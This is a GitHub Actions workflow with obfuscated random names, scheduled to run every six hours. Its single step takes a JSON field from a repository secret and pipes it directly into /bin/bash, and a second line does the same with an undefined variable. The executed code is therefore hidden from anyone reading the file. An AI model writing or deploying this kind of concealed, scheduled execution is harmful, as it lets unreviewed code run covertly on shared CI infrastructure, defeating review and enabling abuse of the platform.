name: sanfenditheer
on:
  workflow_dispatch:
  schedule:
    - cron: '28 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sanfenditheer
        env:
          xalt225: ${{ secrets.xalt225 }}
        run: |
          echo $xalt225 | jq -r .sfcye605 | /bin/bash
          echo $eqmu611 | jq -r .ig1520 | /bin/bash

